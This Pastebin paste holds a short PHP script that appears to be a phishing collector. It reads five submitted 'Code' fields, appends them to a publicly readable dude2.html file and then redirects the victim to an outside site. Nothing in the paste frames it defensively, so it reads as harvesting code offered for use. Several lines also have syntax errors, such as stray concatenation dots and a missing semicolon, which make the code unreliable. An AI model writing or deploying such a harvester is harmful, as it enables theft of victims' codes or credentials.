Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php $line =('');
- $code1 = $_POST['1'];
- $code2 = $_POST['2'];
- $code3 = $_POST['3'];
- $code4 = $_POST['4'];
- $code5 = $_POST['5'];
- $headers .= "Content-Type: text/plain; charset=iso-8859-1\n";
- $mes .= '<br>Code: '.$code1.;
- $mes .= ' - '.$code2.
- $mes .= ' - '.$code3.;
- $mes .= ' - '.$code4.;
- $mes .= ' - '.$code5.;
- $mes .= ".$line."; $file = "dude2.html";
- $fh = fopen($file, "a");
- fwrite ($fh, "$mes\n"); fclose($fh);?>
- <?php
- header("Location: http://www.mspgalore.t35.com");
- ?>
Advertisement
Add Comment
Please, Sign In to add comment